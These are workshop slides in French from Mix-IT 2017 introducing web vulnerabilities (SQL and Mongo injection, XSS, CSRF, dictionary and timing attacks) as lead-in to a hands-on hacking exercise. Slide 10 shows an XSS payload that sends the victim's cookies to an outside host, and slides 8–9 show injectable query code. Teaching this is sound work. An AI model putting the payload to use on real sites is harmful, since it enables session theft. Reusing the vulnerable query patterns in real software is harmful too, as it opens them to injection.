Sortez le Mr Robot qui est en vous !

Transcript

1. Sortez le Mr Robot qui est en vous ! Mix-IT

   2017 - 21/04/2017

2. Workshop “Mr Robot” Mickael Jeanroy Houssem Belhadj Ahmed Développeur @mickaeljeanroy

   https://github.com/mjeanroy Développeur @7ouss3m https://github.com/houssemba

3. Workshop “Mr Robot” hopwork Merci à @hopwork https://www.hopwork.fr Merci à

   @traefikproxy : @ludnadez & @emilevauge ! https://traefik.io

4. Workshop “Mr Robot” Programme - Présentation (~10mns) - Workshop (~1h20)

   - Solutions (~20mns) Un seul but : s’amuser !!

5. Workshop “Mr Robot” Pourquoi ce workshop ? - 2005 :

   MySpace (XSS) - 2010 : Site apache.org (XSS) - 2011 : Sony (SQLInjection) - 2012 : Linkedin (?) - 2012 : Yahoo (SQLInjection) - 2015 : Site jeuxvideos.com (XSS) - Etc.

6. Workshop “Mr Robot” Présentation de quelques failles Hint : Certaines

   seront présentes dans le workshop, d’autres non...

7. Workshop “Mr Robot” Quelques failles : - SQLInjection - MongoInjection

   - XSS (Cross Site Scripting) - CSRF (Cross-Site Request Forgery) - Dictionnaire - Timing Attack - Etc.

8. Workshop “Mr Robot” SQLInjection - Détournement d’une requête SQL -

   Risques principaux : bypass de login, dump de la base données Exemple : SELECT id, nom FROM users WHERE login = ‘“ + login + “‘ “ AND password = ‘“ + password + “‘“

9. Workshop “Mr Robot” Mongo Injection - Même principe qu’une SQLInjection

   - Détournement de la requête MongoDB Exemple : Users.findOne({ login: req.body.login, password: req.body.password });

10. Workshop “Mr Robot” XSS (Cross Site Scripting) - Injection de

    code JavaScript - Risques principaux : vol de cookies, vol de tokens, usurpation d’identité Exemple : <script> var src = "http://domain.com/" + (document.cookie); new Image().src = src; </script>

11. Workshop “Mr Robot” CSRF (Cross-Site Request Forgery) - Utilise les

    mécanismes d’authentification / de session (cookie). - Risques principaux : vol de données, usurpation d’identité Exemple : 1- Alice envoie un lien à Bob 2- Bob clique sur le lien qui l’amène sur banque.com : => Bob s’authentifie automatiquement grâce à son cookie 3- Le serveur effectue l’opération demandée par “Bob”

12. Workshop “Mr Robot” Dictionary Attack - Idée : tester un

    champ de saisie à partir d’un ensemble de données connues comme étant souvent utilisée - Base de mots de passe : http://www.passwordrandom.com/most-popular-passwords Exemple :

13. Workshop “Mr Robot” Timing Attack - Idée : Analyse des

    temps d’exécution pour deviner les valeurs possibles - Risques principaux : bypass de login, découverte de données sensibles Exemple :

14. Workshop “Mr Robot” Quelques astuces : - Testez les formulaire

    : https://github.com/minimaxir/big-list-of-naughty-strings - Comparaison de cas valides et de cas d’erreurs (code retours HTTP, messages d’erreurs, etc.) - Code retour 401 vs 403 vs 404 - Message : “Mot de passe invalide” vs “Identifiants invalides” - Stacktrace Java dans la réponse - Etc.

15. Workshop “Mr Robot” Quelques astuces : - Utilisation des DevTools

    de votre navigateur pour inspecter les données stockées (cookies, local storage, session storage)

16. Workshop “Mr Robot” Quelques astuces : - Inspection des échanges

    réseaux (headers HTTP, temps d’exécution, etc.).

17. Workshop “Mr Robot” A vous de jouer ! http://35.187.80.241

18. Workshop “Mr Robot” Solutions

19. Workshop “Mr Robot” Questions ~ Merci